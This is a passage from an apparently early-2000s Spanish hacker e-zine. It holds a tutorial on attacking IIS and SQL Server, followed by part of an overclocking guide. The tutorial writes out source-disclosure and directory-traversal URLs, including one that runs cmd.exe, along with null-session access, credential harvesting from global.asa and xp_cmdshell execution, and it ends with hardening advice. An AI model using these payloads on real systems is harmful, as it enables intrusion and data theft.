(el mal llamado Under), asi como de mas informacion sobre Echelon... En fin, os pido me disculpeis por enviaroslo incompleto, y me asegurare de que la proxima entrega este todo el material faltante en esta... Si alguno de ustedes quisiera contactarme por algo relacionado a este informe, algun futuro informe, o por cualquier cosa que me quieran contactar (si es que a alguien le puede interesar contactarse conmigo...), pueden hacerlo: En mi direccion de E-Mail, que es: zagatoa@tutopia.com En mi numero de ICQ, que es: 105450884... O en el IRC de red-latina, en los canales "#argentina" , "#locomotion" , "#Pandemonio", donde si no me ven como Zagato_arg (como entro casi siempre), Posiblemente ande como El_Peregrino , Silicon_Knight , o Lyberath... (Entre las 9:00pm y 03:00am hora argentina...) Ahora si... Aqueste caballero se retira... Y recuerden... La Red es nuestro mundo, y nuestro deber es protegerla de las entidades politicas y comerciales que quieren convertir nuestra utopia en un instrumento para ganar mas poder y dinero, censurando y controlando nuestro derecho al conocimiento... Au-revoir, caballeros de la red... Cabalgad en los vientos de la libertad...

ZAGATO :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 09. Ataques a SQL Server ::--.. by PlaXiuS Hola terricolas ... como estan .. ha pasado mucho desde la ultima edicion de "Proyecto R". Bueno el encabezado de este articulo lo escribo mientras pasan la nunca bien ponderaba pelicula "Hackers" en un canal de television abierta aca en Chile ... que significa esto. Pues muy simple tendremos que aguantar a cientos de estupidos con nicks Zero_Cool, Crash_Overdrive ... etc . Se que siempre doy lata con mis introducciones pero este es el unico medio donde puedo expresar lo que siento. Estoy aburrido de ver decenas de sitios crackeados por un monton de estupidos que solo saben correr el exploit del WU-FTP o utilizar el Transversal Unicode del IIS que despues aprecen en IRC gritando al mundo su tremenda haza~a ... sin ningun fin didactico detras del ataque. Son estas cosas que nos hacen reflexionar sobre nuestra labor en CDLR, de que sirve nuestro trabajo ... para que un monton de estupidos utilizen la informacion que gente como nosotros recopilamos para mal utilizarla ??? Bueno hay otro grupo de personas que no son asi y es por ellos que seguimos esta labor. Bueno no los aburro mas con mis pensamientos y vamos al grano. Hasta el momento hemos revisado en articulos anteriores como es se realiza un ataque a sistemas operativos y a las aplicaciones que corren sobre el mismo, hoy veremos como es posible accesar al sistema de base de datos de un sistema lo cual es sumamente delicacdo pues normalmente un atacante deja su marca en el servidor, puede ser un mensaje al admin o algun autografo en la pagina del sitio, eso depende del criterio de cada intruso, pero hay otro tipo de personas que solo buscan alguna forma de lucrar con la entrada a un servidor, como lo son los "DELINCUENTER INFORMATICOS" y que mas sencible que las bases de datos de una empresa. Bueno en este articulo comentare algunas formas de ataque a las bases de datos de un servidor bajo la plataforma MS. CODIGO FUENTE EL PRIMER PASO ============================ Bueno normalmente al acceso a las bases de datos se basan en programas cuya tendencia es hacerlas correr bajo plataforma WEB, es decir utilizar sistemas de paginas activas como ASP, Perl, etc .. la problematica de estos codigos no compilados , es decir es posible ver el codigo fuente del programa, es que son suceptibles a ataques remotos. Me explico, normalmente este codigos se ejecutan en el servidor mostrando solo el resultado en nuestros navedores, no es posible acceder al codigo fuente viendo el source de la pagina html. Pero existen una cantidad bastante importante de fallos en los diferentes tipos de servidores HTTP que son capaces de mostrar dichos codigos. Al acceder a dichos codigos fuentes podemos aprender de que forma funciona la aplicacion y al mismo tiempo estudiar la estructura de las bases de datos. Por ejemplo sobre aplicaciones ASP (active server page) existe un archivo que se puede utilizar para guardar todas las subrutinas que sean comunes para diferentes paginas (para que entiendan los iniciados, se juntan en un archivo las rutinas que no queremos volver a escribir en todas las paginas) por supuesto una subrutina que se utiliza en todas las paginas que acceden a una

base de datos, es la subrutina de conexion. Normalmente esta subrutina de conexion nos dira donde se alojan las bases de datos como tambien las claves con las cuales se acceden a las mismas. Bueno veamos algunas formas de conseguir dichos codigos fuentes. ASP Dot Bug =========== www.servidor.com/archivo.asp. Este fallo fue descubierto por los chikos de L0pht por alla en el a~o 97, este fallo afectaba al IIS 3.0 y consistia en poner un punto despues del nombre de archivo ASP. Bueno el problema es fue que el parche que M$ lanzo creo otro fallo (Me resulta familiar) bueno este nuevo fallo consistia en cambiar el punto que separa el nombre de archivo con la extension por su representacion hexadecimal. www.servidor.com/archivo%2easp. ::$DATA o Alternate Data Streams ================================ www.servidor.com/global.asa::$DATA Bueno este fallo es del IIS 3.0 es bastante antiguo se soluciona con la instalacion del Service Pack 3 de NT 4.0 , pero sigue vigente puesto que exite un muy mal procedimiento de no instalar los service packs despues de reinstalar algun servicio. Me explico si reinstalas el Option Pack 4 (para reinstalar IIS) y no aplicas los SP nuevamente, el IIS sera vulnerable a los ataques que el SP corrrige. SHOWCODE ======== www.servidor.com/msadc/Samples/SELECTOR/showcode.asp?source= /msadc/Samples/../../../../../intepub/wwwroot/global.asa www.servidor.com/iissamples/exair/howitworks/codebrws.asp? source=/../../inetpub/wwwroot/global.asa La aplicacion showcode permite ver el codigo fuente de las aplicaciones, en realidad la idea es ver el codigo fuente de los archivos que vienen como ejemplo en el IIS, por lo cual esta limitado a ver los directorios donde se encuentran dichos archivos de ejemplo. Pero como siempre , es posible aprovecharse de dicha aplicacion si nos devolvemos al directorio raiz del disco y le damos el path completo del archivo que queremos editar. Index Server (extensiones *.HTW) ============ www.servidor.com/null.htw?CiWebHitsFile=/default.asp%20 &CiRestriction=none&CiHiliteType=Full Bueno un problema de Index Server permite ver el codigo fuente de los archivos asp o cualquier archivo editable. IDQ.DLL ======= www.servidor.com/query.idq?CiTemplate=../../../inetpub/wwwroot/global.asa

Una mala implementacion de la la Dll llamada IDQ.DLL permite navegar los directorios del disco pudiendo editar archivos ASP, ASA, INC, etc ... Extensiones *.HTR ================= www.servidor.com/global.asa+.htr Las implementacion de las extensiones HTR es un tema viejo, es cosa que recordemos el nunca bien ponderado IISHACK, que se basaba en un overflow aprovechando dicha extension. Bueno existe un fallo con el cual se puede ver el codigo fuente de las aplicaciones si agregamos el valor "+.htr" . Aunque ustedes no lo crean yo habia probado este string haciendo pruebas sobre IIS y de hecho la pagina me aparecia en blanco ... jamas se me ocurrio hacer un view source .. si hubiera sido asi CDLR tendria el merito de haber descubierto este bug ... jaja pero bueno sera para otra. Virtual UNC =========== www.servidor.com/global.asa%5C Una mala implementaciones de IIS permite ver el codigo fuente de las aplicaciones si enviamos un caracter especial al final de la URL , este caracter es en si un "\" pero que debemos mandar en segun la tabla del codigo ascii agregando un "%" antes, te suena "%20". Para que este fallo sea valido, el sitio debe estar en otra maquina apuntando a otra maquina a traves del path UNC, por ejemplo \\servidor\webcompartido\. Translate:f =========== Nc.exe www.servidor.com 80 GET \global.asa %5C Translate:f El encabezado "Translate:f" es una implementacion para mantencion y administracion remota, pero que se puede mal utilizar para traer el codigo fuente de las aplicaciones. Es necesario poner el ca- racter "\" al final de la URL, y utilizar dentro del encabezado la opcion "Translate:f". Extended UNICODE Directory Traversal ==================================== http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir Bueno que mas decir ... el arma mas utilizada por los script kiddies hoy en dia. Me aburro de ver tanto sitio crackeado con esta tecnica lama .. pero bueno que le vamos a hacer. Este fallo consiste en devolverse unos directorios atras, entrar al directorio %systemroot% y ejecutar un comando con los permisos asignados a usuario anonimo del IIS el IUSR_nombremaquina. Normalmente este usuario tendra permisos de full control sobre el directorio donde corren los asp, entonces es cosa de dar un type sobre el archivo asp. Por experiencia propia podria decir que no siempre veras bien el codigo, normalmente lo baja a tu maquina, pero puedes terminar el string con "archivo.asp+.htr" para ver el codigo en pantalla. Como habran notado existen muchas formas de obtener los codigos fuentes de la

aplicacion asi que la verdad es que es bastante simple poder obtener informacion sobre la estructura de bases de datos de un sitio como tambien las claves y conexiones utilizadas para accesar a estas. CONECTANDOSE A LA BASE DE DATOS =============================== Existen varias formas de conectarse tener acceso a una base de datos hoy veremos algunas formas de acceso a estas. Realmente a veces da pena ver el estado precario de algunos servidores que exponen sus bases de datos a todo el mundo pensando que muchas veces la informacion que guardan pueden ser vital para su compa~ia, pero eso pasa por una falta de conciencia y de un desconocimiento total del tema de seguridad, aunque muchas veces pasa por ser taca~os ... muchas empresas esperan a ser atacados para invertir algun dinero en el tema de seguridad ... pero aun existen muchos personajes que piensan que esto se trata de conectar un servidor a internet y a funcionar. CLIENTE DE RED SQL SERVER ========================= El servidor SQL normalmente trabaja de dos formas gracias a su configuracion por defecto en el cliente de red para SQL "MULTI-PROTOCOL". "Named Pipes": Bueno esta configuracion es conocida ya que trabaja en funcion del soporte netbios de Windows NT ... !!! Si !!! ese con el cual te puedes conectar a los directorios compartidos a traves de Internet ... siiiii ese mismo con el cual puedes ver el entorno de red de una maquina a traves de Internet. Bueno para conectarte a la base de datos puedes hacerlo a traves de tu SQL QUERY ANALYZER pero antes debes establecer una conexion netbios (pipes) con la maquina que contiene la base de datos .... pero como hago esto te preguntaras pues muy simple .. estableciendo una conexion atraves de una NULL SESSION ... mas explicito : net use \\servidor\\ipc$ Cuando pregunta password, pues muy simple das enter y listo .. ahora si esto no funciona quiere decir que el servidor tiene el parche correspondiente , o sea el administrador se dio el tiempo de correr el C2Config o lo hizo manualmente cambiando el registro en la maquina. Si has tenido exito con lo anterior es tiempo de tomar tu QUERY ANALYZER y a jugar ..... pero ..... uffffff se me habia olvidado que por su puesto esta conexion te pedira un username y password. Pues para eso esta el codigo fuente ASP , para conocer la estructura de la base de datos y al mismo tiempo buscar en el archivo Global.ASA o en los <--- INCLUDES ----> la informacion utilizada para la conexion, entre esta info , el username y password para el acceso a la base de datos. "TCP/IP connect": La otra forma de conectarse a un servidor SQL es a a traves del protocolo IP directamente. Primero es necesario crear un DSN en nuestro Data Sources mas conocido como "ODBC", si! ese que esta en tu panel de control. Veamos los pasos a seguir !! uufff que basico pero igual no faltan los newbies por ahi que hay que ayudar. 1.2.3.4.5.Panel de control / Data Sources("ODBC") Lengueta System DSN / New DSN Elegimos el driver SQL SERVER / Finish En nombre .. lo que se te ocurra ... En Servidor pues .. me parece obvio no ???

6.7.8.9.-

Seleccion SQL SERVER AUTENTIFICACION Haz Click en Client Configuration / Selecciona TCP/IP Ingresar el Username y Pass de SQL Server (obtenida del fuente) Next y seleccionar la base de datos.

Ahora solo seria necesario conectarse con el Query Analyzer y listo !! conectado a la base de datos ... Quee !! no escuche bien !!! ahhh no tienes Windows NT menos SQL server para que hablar del Query Analyzer ... ahhh eres un simple usuario de windows 9.x .. mmm que problema no !! has pensado en tener un sistema operativo de verdad .. tonces instala Linux jaja .. bueno NT tambien sirve. Ahh quieres probar ahora .. mm ya veo ..tonces solo debes crear el ODBC en tu maquina y hacer las consultas desde Excel o MS Access puesto que estos programas traen la opcion de conectividad a las bases de datos a traves de un ODBC. Bueno hay algunos linuxeros que dicen que no se puede hacer hacking desde Win2 .. ,mmm que diran ahora...jajajja. Existe una tercera forma mucho mas facil y sin tanta compliacion para conectarse a la base de datos de un servidor remoto. Lo unico que necesitamos es un navegador Web que aguante un componente ActiveX. Cuando se instala SQL Server en un servidor que ya tenga un IIS se crea dentro del directorio virtual "MSADC" un programa de ejemplo que en realidad es un componente activex que simula el Query Analyzer de SQL. La url afectada es la siguiente: http://servidor/msadc/samples/selector/client/ie/adctovb.asp Ahora solo debemos darle un DSN valido como tambien el username y la password adecuada y listo conectado a la base de datos del servidor. COMANDOS SQL ============ Es necesario entender algo de Lenguaje SQL para poder recorrer la base de datos sin da~arla, si eres del tipo que gusta da~ar sistemas tienes prohibido leer este articulo ... puesto que es para gente del mundo del hacking , y como todos ya saben los hackers no hacen da~o a los sistemas solo exploramos en busca de conocimiento con el puro fin de aprender, nada de paginas crackeadas llenas de insultos sin ningun fin aparente .. esa es practica de lamossss, script kiddies, etc ... @Contenido de la base de datos Select * from sysobjects Se desplegara el resultado en varias columnas, una de estas con el titulo "name" bueno esas son tablas contenidas en la base de datos. @Contenido de una tabla Select * from nombretabla Nos traemos contenido de toda la tabla. @Filtros Select * from nombretabla where nombrecolumna = Filtro

Me explico .. te traes todos los datos de una tabla donde (where) el nombre de columna sea igual a tu filtro. Grafiquemoslo mejor. TABLA (1) nombre edad ciudad ====== ====== ====== juanito 21 santiago jose 32 santiago carlitos 21 medellin Tenemos en la tabla 1, tres columnas llamadas nombre, edad, ciudad, que utilzaremos como filtro ... veamos unos ejemplos. "ejemplo1" Select * from tabla_1 where ciudad = santiago Esto traera todos los datos de la tabla donde la columna ciudad sea = a santiago, en este caso el resultado seria algo como lo siguiente: nombre edad ciudad ====== ===== ====== juanito 21 santiago jose 32 santiago "ejemplo2" select nombre from tabla_1 where edad <> 21 nombre ====== jose En este caso usamos <> para decir que nos traiga el campo nombre donde la edad fuera diferente a 21. Bueno los operadores de filtro son los siguientes. > Mayor que < Menor que = Igual <> Distinto @Contar registros Select count(*) from table_1 Con el comando count contamos los registro de la tabla en este caso el resultado seria "3", tambien podemos utilizar los filtros para contar los registros que cuenten con ciertas caracteristicas. Procedimientos Almacenados Extendidos ===================================== La verdad que solo hablare de un solo procedimiento almacenado extendido. Hablaremos de "xp_cmdshell". Bueno los procedimientos almacenados extendidos tiene como mision realizar ciertas labores dentro del mismo sistema

operativo, es decir tienen como mision intercomunicar al servidor SQL al sistema operativo mismo permitiendo ejecutar aplicaciones, parametros y cambios de registro si es necesario, desde un aplicacion SQL o mas bien dicho de un procedimiento almacenado normal. Estos procedimientos almacenados extendidos pertenecen a la base MASTER por lo cual es necesario tener permiso en esta base de datos para poder ejecutarlos. El problema que existen muchos sistemas con User "SA" y passwords en blanco, de hecho es poco comun ver aplicaciones con un usuario destinado a una base de datos en especial. Si se llega a tener acceso a un servidor SQL y a la base de datos MASTER solo seria necesario correo el siguiente comando. EXEC xp_cmdshell 'dir c:' Con esto podremos listar el contenido del disco "C:" , bueno el resto se los dejo a su imaginacion, solo es necesario poner el comando entre "'" comillas simples para poder ejecutarlos a traves de este medio. Kristo de 0wn3d creo por ahi un programa llamado SQLCMDEXPLOIT capaz de conectarse a un servidor SQL y hacer el trabajo por ti solo tienes que poner la ip y el comando que quieras ejecutar , asi que si eres un lamercillo ... bueno ahi esta tu programa. Dejaremos el tema de los procedimientos almacenados extendidos para otra ocasion donde los trataremos mas a fondo con todas las funciones interesantes que estos tienen. CONTRAMEDIDAS (ATENCION ADMINISTRADORES) ======================================== Exiten muchas contramedidas al respecto. Pero ojo hay muchos que creen que instalando todos los parches de Mocosoft estan a salvo de esa peste llamada "HACKERS" ... jijiji .. si piensas asi estas muy equivocado. Te recomiendo que sigas esta pauta, ahora si no sabes como ejecutarla averigua pues ya existen muchos manuales graficos (onda screenchot) click aki click alla y listo ... Securitizacion del IIS: ======================= - Instalar Internet Information Server en una particion diferenta a la del sistema operativo. (si WINNT esta en C: Instalas IIS en el D:) - Instalar Service pack 6a despues de haber instalado IIS. - Eliminar el Defaul Web Server y crear un nuevo Web Server que apunte a tu aplicacion, dicha aplicacion debe encontrarse en una particion diferente a la del sistema operativo. - No crear directorios con permisos de ejecucion si es posible dentro del nuevo site. - Eliminar Extensiones STM, IDA, IDC, IDQ, HTW, HTR si es posible dejar solo extensions ASP. - Bajar cualquier otro servicio que no se utilize dentro del IIS com FTP

Server , Web de administracion , SMTP. - No utilizar extensions INC , DAT , ETC ... para los includes , estos archivos se pueden leer perfectamente desde el navegador si se sabe la ruta ... utiliza extensiones ASP , ASA. - Si utilizas GLOBAL.ASA , hace mension a un archivo .INI que este dentro de WINNT, en dicho archivo has la referencia al DSN con su respectivo User y Pass. Securitizando SQL Server ======================== - Cerrar puerto 1433 a Internet .. mejor aun deja los puertos necesarios si es un Web Server deja abierto solo el puerto 80, puedes hacerlo con el IP Filter de WINNT o si tienes mas recurso con un Firewall. - Cambiar el passwd del usuario SA. - Crear un usuario por cada base de datos a utilizar, nunca corras aplicaciones sobre la base MASTER pues es muy probable que alguien pueda ejecutar procedimientos almacenados extendidos a traves de esta aplicacion. - Renombrar Procedimientos Almacenados Extendidos , con esto evitaras que un atacante tenga acceso al sistema operativo a traves de estos. OJO .. cuando cambies los nombres de dichos procedimientos almacenados estos dejaran de funcionar automaticamente. - Y eso .. puede que algo se me quede en el tintero , pero esto es lo minimo para mantener tu sistema seguro. Eso es todo por esta edicion ... espero que les haya gustado el articulo, veamos si los sorprendo con el articulo para la proxima edicion. PlaXiuS CDLR Security Team plaxius@bigfoot.com :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 10. Overclocking ::--.. by General Failure & Mr.Nexus 1 2 3 4 5 6 Que es el overclocking Conceptos basicos: Bus y multiplicador Conceptos avanzados: Overclocking en micros superiores Tecnicas de refrigeracion Overcloking, si o no? Recursos

1 - Que es el Overclocking --------------------------

Es probable que hayas escuchado muchas veces que alguien le hiso "no se que" a su pc y funciona "no se cuantos" Mhz mas rapido, o has leido por ahi que se puede aumentar la velocidad sin gastar plata. Seguramente se referian al antiguo, pero aun vigente OVERCLOCKING, el aumento de la frecuencia del reloj. Esta tecnica "exprime" la capacidad de tu procesador y acelera tu sistema, ...aunque, como todo, tiene su riesgo. En palabras simples, overclockear es modificar los ajustes del hardware para hacerlo funcionar mas rapido de lo que el fabricante pretende. Todo hardware tiene unos margenes de velocidad de trabajo para los que fue dise~ado, pero la gran mayoria del hardware puede trabajar mas rapido de lo que tiene establecido. En este caso, hablaremos de overclockear procesadores, es decir, veremos algunas tecnicas usadas para aumentar sus frecuencias de trabajo con respecto a las que vienen predeterminadas en estos. 2 - Conceptos basicos: Bus y multiplicador en la arquitectura Pentium / K6 -------------------------------------------------------------------------Basicamente, para overclockear hay 2 ajustes que se pueden manipular: La velocidad del reloj de la CPU y la velocidad del reloj BUS del sistema. Estos valores estan controlados por jumpers en la placa base, o por valores que se pueden ajustar en la BIOS del sistema. En el caso de que en tu pc se pueda ajustar desde la BIOS, ni siquiera tendras que abrir el computador. Estos valores controlan la velocidad de la CPU, y la velocidad del Bus de sistema para que puedas trabajar con diferentes procesadores. O sea, si tienes por ej. un amdk6 de 300 Mhz y lo quieres cambiar por un procesador de 366 Mhz, cambias el micro y modificas los jumpers o los valores en la BIOS para que la placa base trabaje a la nueva velocidad, siempre y cuando tu placa madre lo permita. Aqui estan unos valores estandar de CPUs, posibles combinaciones entre la frecuencia del bus y la del multiplicador. Frecuencia bus Multiplicador 66 Mhz 66 Mhz 66 Mhz 66 Mhz 66 Mhz 66 Mhz 66 Mhz 66 Mhz 66 Mhz 100 Mhz 100 Mhz 100 Mhz 100 Mhz 100 Mhz 100 Mhz 100 Mhz 100 Mhz 100 Mhz 2 2.5 3 3.5 4 4.5 5 5.5 6 2 2.5 3 3.5 4 4.5 5 5.5 6 Frecuencia clock 133 166 200 233 266 300 333 366 400 200 250 300 350 400 450 500 550 600 Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz Mhz

Pero lo que tu quieres es saber como hacerlo, cierto? Antes de que lo intentes tienes que tener los ajustes de los jumpers de tu

placa base, o los ajustes de la BIOS, segun tu caso. Estos estan en el manual de tu placa base (si nunca has revisado este manual, deberia darte vergenza!). Si no lo tienes, visita la web del fabricante y busca el manual... Si no consigues el manual o los esquemas de las posiciones de los jumpers, te recomiendo que NO intentes el overclocking... lo puedes lamentar (Un amigo intento hacerlo y cambio casi todos los jumpers de posicion, y al no saber despues donde estaban... ). Multiplicador de frecuencia. Veamos el primer metodo que es incrementar la velocidad del reloj de la CPU. Un ajuste controla la velocidad del bus de sistema y otro el multiplicador. El multiplicador es un numero por el que multiplicamos la velocidad del bus del sistema para obtener la velocidad del procesador. Un Pentium 150 corre sobre el bus de sistema a 60 Mhz con multiplicador 2.5, esto es, 60*2.5=150 Mhz (facil, cierto?). Para overclockear el sistema sin cambiar la velocidad del bus, ajustamos el jumper o el valor de la BIOS que controla el multiplicador. Por ejemplo, puedes subir el multiplicador hasta 3.0x y hacer trabajar a la CPU a: 60*3.0=180 Mhz. Pero... el resultado puede ser un sistema muy inestable, porque estas forzando el procesador. Incluso puede no funcionar, colgarse (sobre todo con gindous), e incluso, en caso de que te hayas ido en la "vola" y los hayas overclockeado muy alegremente... achicharrar el procesador (ups!). Pero tambien esto tiene arreglo y mas adelante veremos algunas tecnicas de refrigeracion. Frecuencia del Bus. El segundo metodo, subir la velocidad del bus de sistema, tiene otras repercusiones, ya que estas haciendo trabajar mas rapido tambien a otros componentes del ordenador. Ten en cuenta que del bus de sistema es el que la lleva, y si va mas rapido TODO ira mas rapido, no solo la CPU. Retomemos el obsoleto pentium 150 del ejemplo anterior. Si subimos la velocidad del bus de sistema a 66Mhz, haremos trabajar a la CPU a 166Mhz. No parece mucho, pero al trabajar TODOS los componentes mas rapido, el rendimiento sera mayor, al menos un 15% mas. El exito depende de la capacidad de los circuitos de la placa madre, y como no estamos exprimiendo tanto la CPU (Ahora 166 frente a los 180 de antes), el sistema sera mas estable que en el caso anterior. Y esto se pone mas interesante si hablamos de placas que soportan velocidades de 83Mhz, que incluso llegan a 100Mhz. Con el mismo Pentium 150Mhz de antes, en una placa que soporte la velocidad de bus de 75Mhz, y bajando el multiplicador a 2.0x conseguiremos aumentar el rendimiento sin forzar la CPU, ya que esta sigue trabajando a 150Mhz, pero el sistema a aumentado hasta 75Mhz desde los 60 originales... Y si la placa puede funcionar, de forma oficial o no oficial, a una velocidad de sistema de 83Mhz, podrias usarlo con el multiplicador a 2.0x. Esto resulta en un Pentium 166, pero el sistema rinde en realidad como un 200Mhz o mas!!... Lo mejor es que las tecnicas del overclocking sirven para pentiums, celerones, k6, etc. 3 - Conceptos avanzados: Overclocking en micros superiores ---------------------------------------------------------Ya hemos visto como overclockear micros algo antiguos, Pentiums, K6, ... y vemos que es muy sencillo, pero la cosa se complica con los micros algo mas superiores. Aunque la base del overclocking sigue siendo la misma, cambiar el bus o el

multiplicador, las tecnicas varian mucho debido a que a partir de cierta epoca, los fabricantes de microprocesadores decidieron bloquear de fabrica el multiplicador en sus micros. Aunque en principio se penso que esto dificultaria mucho el overcloking, al limitarlo solo a subir el bus de la maquina, esto no ha sido asi, ya que a lo largo del tiempo se han descubierto multiples formas para desbloquear los multiplicadores bloqueados. Aqui veremos algunos ejemplos de ello: - Celerones: Los micros Celerones destacaron por su capacidad para ser forzados hasta limites insospechados, sin que la temperatura del micro subiera en exceso. Marcaron un punto de inflexion en la carrera de los overclockers y es raro encontrarse a uno que no haya disfrutado de este excelente procesador. Aunque el multiplicador del Celeron venia bloqueado de fabrica, en seguida se descubrio como la propia tecnologia del Slot-1 en que venia el Celeron 1 nos podia ayudar a enviarle los voltios que quisiesemos al micro. Jugando con unos contactos concretos, podiamos subir o bajar el voltaje que el aplicabamos al micro. Estos contactos son: A-119, A-120, A-121, B-119, B-120,B121 Las combinaciones de estos que seguramente mas nos interesaran, seran: 2,2 v: Tapar contactos A-121, A-119, B-119 2,4 v: Tapar contactos A-120, A-121, B-119 Las tecnicas para evitar este contacto fueron varias, ... habia quien tapaba los contactos con cinta aislante, pero este es un metodo bastante chapuza, ya que al sacar de nuevo el micro del slot, a veces la cinta se quedaba en el slot. Lo mejor resulto ser utilizar un barniz especial que se vende en tiendas de electronica, llamado 'barniz de blocaje', tan solo una gota era necesaria para tapar el contacto requerido, y el barniz te aseguraba que no hiciera contacto :) El resultado: un formidable micro capaz de incluso doblar su rendimiento con tan solo unos peque~os cambios. - Athlones: El micro revolucionario de AMD, con el que ha pateado tantas veces el culo a intel en cuanto a ventas y a orgullo se refiere, :) Los Athlones tambien venian con el multiplicador bloqueado, pero en seguida se difundieron por ahi unos peque~os circuitos integrados con unos jumpers o con switchs en ellos que se colocaban en el propio micro y hacian las veces de regulador de voltaje, pudiendo asi cambiar el multiplicador, el vcore... La manera de sujetar estos nuevos circuitos a los Athlones, vino de la mano de la propia AMD, ya que si se quita la carcasa de plastico que cubre a los Athlones de Slot 1, se puede ver en la parte superior una especie de conector vacio donde colocar estos ingenios desbloqueadores. Estas peque~as tarjetitas tienen diversos nombres y se pueden encontrar en muchos sitio de la red a un precio que ronda los 40$. Algunos de los nombres que han adoptado estas tarjetas son, Golden Finger, FreeSpeed, .... - Durones: O tambien conocidos como los machaca-celerones. La respuesta de AMD cubriendo las necesidades de los overclockers, un micro que salio para pulir en el mercado de los equipos baratos y de gama baja. La competencia directa de los celerones de intel fue este magnifico micro que destaco por ser el que revivio las esperanzas de muchos overclockers al alcanzar velocidades enormes con un micro gama baja. Los durones son micros sencillos de desbloquear, pero hay que echarle ...

'pantalones' al asunto, tan solo necesitamos una mini taladradora y un lapiz de punta de dureza media. Si vemos el micro desde arriba, veremos unos minusculos puentes, unos haciendo contacto y otros no, serigrafiados con las indicaciones L1, L2, ... L7 Los que nos interesan son los L6, 3, 4 y 7. Modificando estas peque~as uniones podremos seleccionar una nueva frecuencia y un nuevo voltaje. Podemos romper los puentecillos con la taladradora de antes, y unirlos simplemente dibujandolos con el lapiz de dureza media. Si, el grafito es conductor :D La solucion ideal para unir los puentes tambien puede ser usar unos rotuladores especiales, que se llaman rotuladores conductores, y que como siempre, se pueden adquirir en tiendas de electronica, pero si no te quieres gastar mas que la paciencia, el lapicero normal es una excelente solucion. Existen tablas con las posiciones correctas de estos puentecillos por muchas paginas de Inet, mira abajo en la bibliografia. Estos meras veras final ejemplos de overclocking en micros un poco mas nuevos no son mas que ideas de los que puede ser el overclocking en micros actuales. Si de te interesa forzar tu micro pasate por las paginas que decimos al del articulo, seran una buena guia para profundizar en esto.

4 - Tecnicas de refrigeracion ----------------------------Silicona termoconductora Ventilacion Agua Trucos - Termometro con sonda - MBM Tan importante es saber como forzar un micro, como saber como refrigerarlo. El calor es el peor amigo de los chips, placas y circuitos; y por esto se han desarrollado muchisimas tecnicas para mantener nuestros equipos lo mas frios posible. .Silicona termoconductora La silicona termoconductora es una especie de pasta blanca que se debe aplicar en una capa muy fina entre el disipador y el micro, uniformemente y sin que queden grumos. No importa si manchamos los contactos del micro con la silicona, ya que no es conductora de electricidad. Su finalidad es termoconductora, o sea, favorece el paso de calor desde el micro hacia el disipador, con lo que conseguimos unos cuantos grados menos en nuestro micro. Esta pasta es muy barata y se puede conseguir en peque~os botes de un par de centilitros en cualquier tienda de electronica. Es muy importante que la capa a aplicar sea muy fina, ya que si nos pasamos, podemos provocar el efecto opuesto al deseado y evitar el intercambio de calor.

Al ir a aplicar la silicona termoconductora, podemos encontrarnos con una especie de pegatina extra~a entre el disipador y el micro. Esto puede ser varias cosas, desde una pegatina normal y corriente que ahi no hace otra cosa que estorbar, hasta una cinta de pegamento que ejerce labores de termoconduccion. Sea lo que sea, lo mejor es quitarlo sin miramientos y aplicar la silicona, ya que esta nos ofrecera mucho mejores resultados que cualquier medida estandard. Tambien es bueno lijar un poco la parte del disipador donde vamos a aplicar la silicona, para dejarlo totalmente liso y sin ninguna deformidad, y que asi se adapte perfectamente al micro. .Ventilacion: Las 'tecnica' de refrigeracion mas comun consiste simplemente en abrir la caja xD, con esta chorrada podemos bajar la temperatura del micro en unos cuantos grados, pero con la molestia del ruido que producen los ventiladores, asi que descartemos esto .... Hablando en serio, lo mas normal que se suele hacer cuando se fuerza un micro es cambiar el ventilador del micro y a~adir nuevos ventiladores por el interior de la CPU. Cambiar el ventilador del micro es bien sencillo, simplemente se separa el disipador-ventilador del micro y se cambia por uno nuevo, mas pontente, menos ruidoso ... en definitiva, mejor. Una marca excelente de ventiladores muy muy chulos es SUNON (www.sunon.com.tw) Dependiendo del tipo de micro que tengamos y de su socket, deberemos escoger el tipo de disipador-ventilador necesario, llegando incluso a necesitar dos ventiladores para algunos micros en slot, como el K7. Pero no solo debemos poner un ventilador potente en el micro, si no tambien en el interior de la CPU. Lo mas comun es tener el ventilador en el micro, otro en la fuente de alimentacion extrayendo aire y otro ventilador potente en el frontal de la caja, metiendo aire. Para ver bien como debe ser el flujo de corriente del aire en el interior de la caja, a ver si me sale el ASCII ... se supone que es una torre vista de lado, con el frontal hacia la derecha... --------------------------------SALE <-- |## <- \ | AIRE <-- | + <- \ -------- | |## \ \ 5 1/4 | | \ ^ \ -------- | |-----+ \ \ SALE <-- | + <- \ |AC/DC+ \ AIRE <-- | + <--- \ |-----+ \ \ | \ ^ \ | +----------\ \ '| | \ ^ \ '| | PLACA \ \ 5 1/4 | -------- | | ----- | 3 1/2 | ----- | 3 1/2 | ----- | | PARTE FRONTAL DE LA CAJA

'| '| | | | |

| BASE \ ^ \ | \ \ | --|\ ^ \ | ----| \ <---| ----| <------+--------------+

| | ##| + | <--- ENTRA + | <--- AIRE ##|

